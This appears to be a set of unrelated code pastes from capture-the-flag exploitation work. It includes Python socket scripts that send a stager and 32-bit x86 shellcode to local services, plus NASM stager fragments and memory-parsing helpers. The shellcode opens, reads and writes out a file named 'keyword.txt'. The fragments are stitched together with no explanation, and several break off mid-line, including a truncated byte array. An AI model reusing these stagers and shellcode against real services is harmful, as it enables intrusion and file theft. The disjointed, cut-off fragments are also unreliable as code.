potetisensei

from socket import *
from struct import pack

p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10014))

stager = "\x50\x31\xdb\x6a\x03\x58\x59\x6a\x7f\x5a\xcd\x80\x90\x90\x90\x90\x90"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"

p.send(pack("<I", len(stager)))

potetisensei

BITS 32

push eax
xor ebx, ebx
push BYTE 0x03

pop eax
pop ecx
push BYTE 0x7f
pop edx

potetisensei

BITS 32

mov ecx, eax 
xor ebx, ebx
xor eax, eax
xor edx, edx
mov al, 0x3
mov dl, 0x7f
int 0x80

potetisensei

from socket import *
from struct import pack

p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10000))

stager = "\x89\xc1\x31\xdb\x6a\x03\x58\x6a\x7f\x5a\xcd\x80"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"

p.send(pack("<I", len(stager)))

potetisensei

BITS 32

mov ecx, eax 
xor ebx, ebx
push BYTE 0x03
pop eax
push BYTE 0x7f
pop edx
int 0x80

potetisensei

import os
from commands import getoutput

stages = []
for i in range(0, 10):
    stages.append("stage0{num}".format(num=i))
for i in range(10, 16):
    stages.append("stage{num}".format(num=i))

print stages

potetisensei

push eax ; arg2
push edx ; arg1
call esi

potetisensei

unsigned char[] randpad = "\xfc\x8a\x45\x51\x67\x8c\xa9\xc0\xb0\xfd\xf7\x6f\xb8\x50\xf1\x2f\x7a\x62\x66\xe3\xd3\xc3\x6e\xbe\x37\x39\x33\x68\x3b\xc6\x76\x1e\xae\xaa\x83\xed\x57\x1a\xf1\x29\xe6\xc1\xb9\x9e\xdd\xa2\x86\x2c\x1a\xdc\x49\x9d\x82\x01\xd5\x3a\xb5\xd3\x33\x12\x1c\xce\x94\x2b\xc3\xb0\x6c\xbc\x46\x73\x39\x5e\x7b\xc7\xb4\x9e\x56\xf0\xad\x72\x5e\x83\xc7\x05\xc5\xe9\x2e\x85\x88\x79\x94\xf7\xe7\xac\x34\xfe\x5c\xce\x2e\x13\xf1\xcc\x8e\xea\x60\x83\xbe\xdc\x4a\xbb\xe8\xdf\x65\x20\xef\x44\xad\xfa\xd6\x12\x83\xd5\xdc\x94\xad\x1f\xe1\x5f\xe8\xfa\x7e\x3f\xda\x61\xe3\xdf\xab\x5b\x4f\x2a\x6c\x24\x82\xad\x17\x89\xba\x29\xb9\x46\x34\x74\x64\xf7\x45\x22\x8d\xaf\x33\xd6\x52\xb5\xde\x10\xe4\x53\x5d\x96\xb7\xe2\x2e\xcb\xb1\x75\xbc\x74\x5a\x21\x29\x8c\x57\xb3\x16\x5e\xc7\xc8\xc2\x26\x35\x48\x2d\x3c\x60\x7b\x5d\xdd\xa8\x29\x61\x19\xd0\xef\xee\x6d\x04\xdd\x20\x51\x95\x1d\x01\xe1\xda\xda\xb4\xa5\x46\xd9\xcb\xaf\x56\xb5\x20\x05\xd0\x6b\xd2\x22\x21\x2f\x2d\xd3\x73\x97\x56\x89\xae\xac\x02\xb6\x35\xd2\x14\x87\xc6\x49\xdf\x0e\x17\

potetisensei

import time
import socket

def calc(sum, buf, i, j):
 ret = ((ord(buf[i/8 + j]) << (i%8))%0x100000000)|((ord(buf[i/8 + j +1]) >> (8 - i%8))%0x100000000)
 ret %= 0x100
 sum |= (ret << (24-j*8));
 return sum;

mem = open("hoge.bin").read()

potetisensei

from struct import unpack

stack = []
base_addr = 0x605000
start_addr = 0x60e240

mem = open("hoge.bin").read()
dic = {}

def search_tree(addr, route):